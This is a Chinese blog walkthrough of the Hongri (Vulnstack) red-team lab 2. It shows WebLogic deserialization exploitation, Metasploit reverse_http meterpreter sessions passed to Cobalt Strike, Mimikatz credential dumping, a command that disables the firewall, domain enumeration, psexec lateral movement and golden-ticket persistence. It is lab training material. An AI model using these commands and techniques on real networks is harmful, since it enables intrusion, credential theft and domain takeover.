红日靶场第二关

已于 2022-04-15 18:11:11 修改
阅读量7.3k 收藏 16
点赞数 1
分类专栏: 内网攻防 文章标签: 安全 网络
于 2021-11-16 15:23:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47533648/article/details/121356829
版权
本文详细记录了一次红队靶场实战过程,涉及环境配置、信息收集、Weblogic漏洞(CVE_2020_2551和CVE_2019_2725)利用、内网渗透、权限提升、域控攻取及权限维持。通过Weblogic SSRF漏洞获取系统权限,并利用MSF和CS进行内网横向移动,最终利用黄金票据维持权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

红日靶场第二关

一、环境配置

环境说明
内网网段:10.10.10.1/24
DMZ网段:192.168.111.1/24
测试机地址:192.168.111.1(Windows),192.168.111.11(Linux)
防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
配置信息
DC
IP:10.10.10.10OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80IP2:192.168.111.80OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201IP2:192.168.111.201OS:Windows 7(32)

环境配置踩坑点:当登录WEB虚拟机时,需要先恢复快照3,登陆时切换用户为:WEB\de1ay 密码:1qaz@WSX才能进入,进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行statweblogic服务。

二、目标

红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
    Bypass UAC
    Windows系统NTLM获取(理论知识:Windows认证)
    Access Token利用(MSSQL利用)
    WMI利用
    网页代理,二层代理,特殊协议代理(DNS,ICMP)
    域内信息收集
    域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
    域凭证收集
    后门技术(黄金票据/白银票据/Sid History/MOF)

三、WEB外网打点

3.1信息收集(nmap):

在这里插入图片描述

访问7001端口,发现作妖处:

在这里插入图片描述

3.2信息收集(dirsearch):

在这里插入图片描述

3.3漏洞检测

网上公开有漏洞,印象深刻的是未授权的漏洞,但是进去之后很难找到用户名和密码,直接用weblogic漏洞工具检测。

存在CVE_2020_2551漏洞

在这里插入图片描述

存在CVE_2019_2725漏洞

在这里插入图片描述

CVE_2019_2725漏洞对应JAVA反序列化漏洞,可以直接工具。

拿下服务器:

在这里插入图片描述

在这里插入图片描述### 3.4更新(无关闭防火墙上线)

通过上面的weblogic扫描发现,SSRF漏洞存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp

MSF:
> use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
> set rhosts 192.168.235.80
> set lhost 192.168.235.129
> set target 1
> set payload windows/meterpreter/reverse_http
> background 拿到session 1 
弹给CS:
> use exploit/windows/local/payload_inject
> set payload windows/meterpreter/reverse_http
> set DisablePayloadHandler true
> set lhost 192.168.111.129
> set lport 3333
> set session 1

上线后提权,后续步骤一样:

在这里插入图片描述

四、内网渗透

4.1 上线CS

4.1.1 发现360杀软

在这里插入图片描述

4.1.2 powershell绕过360杀软

在这里插入图片描述

反弹CS成功:

在这里插入图片描述

4.2 信息收集

4.2.1 判断是否存在域

ipconfig /all ,DNS后缀de1ay.com,存在域

在这里插入图片描述

net config workstation

在这里插入图片描述

4.2.2 提权(MS14-58)

测试权限shell net view /domain

在这里插入图片描述

提权成功

在这里插入图片描述

在这里插入图片描述

4.2.3 获取凭证
access—>hash dump

在这里插入图片描述

Mimikatz抓取

在这里插入图片描述

在这里插入图片描述

4.2.4 继续信息收集
ipconfig /all
net config workstation                      # 当前登录域
netsh advfirewall set allprofiles state off # 关闭防火墙

net time /domain                       # Ping获取域控IP
nltest /dsgetdc:<domain_name>          # 也可以获取域控IP

net view /domain
net view                                 # 域内主机
net user /domain                         # 域内用户
net group "domain admins" /domain        # 域管理员
net group "domain controllers" /domain   # 域控

域内主机:

在这里插入图片描述

资产收集:(ICMP)协议

在这里插入图片描述

在这里插入图片描述

4.2.5 开启3389

在这里插入图片描述

4.3 内网横向

4.3.1 MSF联动CS
  • 通过payload_inject将Shell发给CS
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use exploit/windows/local/payload_inject 
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.111.2
msf6 exploit(windows/local/payload_inject) > set LPORT 10080
msf6 exploit(windows/local/payload_inject) > set session 1
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf6 exploit(windows/local/payload_inject) > run
4.3.2 CS联动MSF
# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用x64
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port>   # 设置任意端口进行监听
# 启动监听器
msf> run
4.3.3 上线CS目标

portscan 10.10.10.1/24 445 arp 200

在这里插入图片描述
)]

4.4 psexec传递

4.4.1 拿下PC

获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalStrike本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec:在主机上使用服务派生会话 )

在这里插入图片描述
)]

4.4.2 拿下DC
4.4.1 配置监听

在这里插入图片描述

4.4.2 psexec传递给DC

拿下域控!!!

在这里插入图片描述

五、权限维持(黄金票据)

5.1 查看账户NTLM HASH和SID值

在这里插入图片描述

在这里插入图片描述

5.2 黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
  • WEB机 Administrator 权限机器->右键->Access->Golden Ticket

在这里插入图片描述

运行中

在这里插入图片描述

5.2.1伪造用户名成功

shell dir \DC\C$

在这里插入图片描述

渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 528
ATT&CK红队评估(红日靶场二)
红日靶场2
weixin_48169878的博客
07-10 5087
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
红日靶场(二)
qq_58091216的博客
05-02 3808
整体流程如下:信息收集 => weblogic漏洞利用 => 冰蝎连接上传大马 =>WEB主机上线CS => 内网信息收集 => MS17_010利用 => PTH => DC主机上线 => 挂代理3389登录PC主机 => 上传木马 => PC主机上线 => 构造黄金票据维权 => 痕迹清理。
内网渗透——红日靶场
最新发布
2401_88083440的博客
04-01 1117
相较于第一次打红日靶场来说,感觉已经熟练了不少,之前的知识补充还是很有用的,虽然也许还存在一些问题,但慢慢来会让自己好受不少。写的部分还是有一些欠佳,而且今天在看之前写的文章的时候竟然发现有几篇文章被系统设为 V I P 可见了,真真是对不起给予我帮助的师傅们。有问题的地方,还请各位斧正,希望能给我一些宝贵的意见!
ATT&CK红日靶场
hjxhjx1589的博客
07-28 2147
欢迎大家一起学习红日团队的靶场二,可以学习域渗透,web,内网渗透等相内容。
红日靶场
woshicainiao666的博客
01-24 2076
进入web之后,C:\Oracle\Middleware\user_projects\domains\base_domain。通过切换用户,使用de1ay/1qaz@WSX进入web靶机,修改密码,然后直接注销退出。web靶机开始需要切换用户 de1ay/1qaz@WSX 登录。添加一个网络地址,仅主机模式,网段为10.10.10.0/24。挂代理,转包,将数据包中的恶意代码换成哥斯拉的jsp木马。1433:mssql服务,可能存在爆破,注入,弱口令等。445:smb服务,可能存在ms17-010漏洞。
红日靶场02
weixin_55541277的博客
10-06 4964
文章目录红日靶场020、环境搭建一、外网域1.扫描端口2.目录扫描3.Weblogic getshell4.建立MSF会话5.获取hash6.远程桌面连接7. 收集跳板机信息二、内网域0.收集内网信息1. 建立路由,配置代理2. 黄金票据攻击3. 上传木马4. 正向连接5. 获取hash6.远程桌面 红日靶场02 0、环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 默认密码:1qaz@WSX 先配通IP, 默认没有开启Web服
渗透测试-红日靶场
konglong12311的博客
05-23 2018
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
xt350488的博客
11-28 1314
我测试了一下,shell上传,内存马注入,蚁剑连接,都获取不到shell,可能我太菜了。WebLogicTool,直接漏扫,存在CVE_2016_0638_ECHO,漏洞。靶场一套下来共20多G,夸克下载(新用户只要三块)官网的百度不行新用户贵。看到了DC这个名称的主机,基本可以确定10.10.10.10是域控主机了。利用,提示了怎么使用,需要在后买你加两个参数,分别是IP和端口。ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略。先搜第一个2017那个,但是没有结果,搜搜第二2019的。
渗透测试-红日靶场
konglong12311的博客
05-22 2011
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日靶场
qq_26947429的博客
08-02 4777
描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。靶场统一登录密码:1qaz@WSX Bypass UAC Windows系统NTLM获取(理论知识:Windows认证) Access Token利用(MSSQL利用).
PB 红日靶场2(内网渗透)(Raven2)
信息安全,渗透测试,安全服务,环境配置
01-07 740
以岁月为纸、坚持为笔,书写着热爱。
ATT&CK实战:红日靶场
学生
06-19 1041
发现weblogic 使用工具注入内存马 ,上传正常的马子连接不上 ,因目标机器安装了360 会被杀掉 内存马有一定的免杀性。执行whoami命令 可知当前用户的权限为管理员权限 直接反弹shell到msf 方便操作。这里因为有360 所以getsystem命令并不能提权成功 可以使用进程迁移到高权限进程。哥斯拉填写开启msf的ip和监听端口 点击Go反弹到msf。\\DC.de1ay.com 的用户帐户。查看进程 发现很多system权限开启的进程。双网卡 10.10.10.80。
红日内网渗透靶场2(ATK&CK红队评估实战靶场二)
热门推荐
qq_45780190的博客
03-01 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 跟靶场一中的环境类似需要模拟内网和外网两个网段, PC端虚拟机相当于网服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。 PC配置如下: DC在该环境中充当是域控。DC配置如下 : WEB配置:需要两块网卡,相当于网服务器。 这里需要将新增的网卡VMnet2,ip调成了10段。 网络配置完成,这三台虚拟主机默认开机密码都是:密码
红日靶场2学习
m0_75178803的博客
02-14 1683
Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马。开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞。存在两个CVE漏洞,CVE-2017-3506、CVE-2019-2725。放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。web的配置和pc的配置一样就行,就是两台网络适配器。
Vulnstack红日靶场2二:从0到1的超详细操作指南(新手小白都会的通俗易懂教程)
m0_74631795的博客
02-22 1653
翻车了,这里不明白为什么还是不行,我试过从WEB主机,就算没有黄金票据也可以访问C盘。不过原理还是这样子的,原本没有权限访问,制作黄金票据后可以访问,如果大家有知道原因的话可以在评论区告诉我。如果在扫描或测试过程中发现7001端口开放,可能存在多种已知漏洞,这些漏洞可能会被攻击者利用。krbtgt用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户。跳出弹窗后,开启360,账号为“Administrator”,密码不变。建议使用物理主机连接手机热点操作,校园网内可能不方便操作。
红日-VulnStack靶场-ATT&CK(二)
braty_的博客
10-01 1266
红日二,cs横向移动
红日靶场1
03-13
### 红日靶场的概述 红日靶场是由红日安全团队开发的一系列用于网络安全测试和渗透测试的学习平台。这些靶场旨在帮助学习者通过实际操作掌握网络攻击与防御的技术细节[^1]。 #### 红日靶场的功能特点 红日靶场提供了多个版本,例如 `vulnstack` 系列中的不同版本(如 vulnstack-7),每个版本都模拟了一个真实的网络环境,包含了多种常见的漏洞场景供用户实践。例如,在 `vulnstack-7` 中,可以通过访问其官网获取详细的漏洞描述和技术背景信息[^2]。 #### 域控制器的操作方法 在某些红日靶场环境中,可以利用命令行工具来查看域控制器的信息。例如,使用以下命令可以列出当前域下的所有域控制器: ```bash net group "domain controllers" /domain ``` 这一步对于了解目标网络结构非常重要,尤其是在涉及 Active Directory 的渗透测试中[^3]。 #### 远程连接到域控制器 一旦获得了域控制器的 IP 地址,就可以尝试通过远程桌面协议 (RDP) 登录到该服务器上。如果已知默认管理员账户及其密码,则可以直接登录并进一步探索内部资源。需要注意的是,在真实环境下不应未经授权执行此类操作;而在练习过程中为了简化流程可能会提供明文凭据,比如用户名为 `administrator`,密码为 `Admin12345`[^4]。 #### 存活主机探测技术 针对内网中存在的其他潜在可攻陷设备,Metasploit Framework 提供了几种有效的扫描模块来进行存活检测。以下是几个常用的辅助模块示例: - **UDP Sweep**: 使用 UDP 数据包批量发送请求以识别响应节点。 ```ruby use auxiliary/scanner/discovery/udp_sweep ``` - **NetBIOS Name Query Scanner**: 针对 Windows 平台上的 NetBIOS 协议实现服务名称解析功能。 ```ruby use auxiliary/scanner/netbios/nbname ``` 以上提到的方法均需谨慎对待,并仅限于合法授权范围内的实验用途[^5]。 ### 注意事项 尽管上述内容有助于理解如何开展基础性的信息安全评估活动,但在任何情况下都不应滥用所学技能去损害他人利益或违反法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cllmsy_K

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值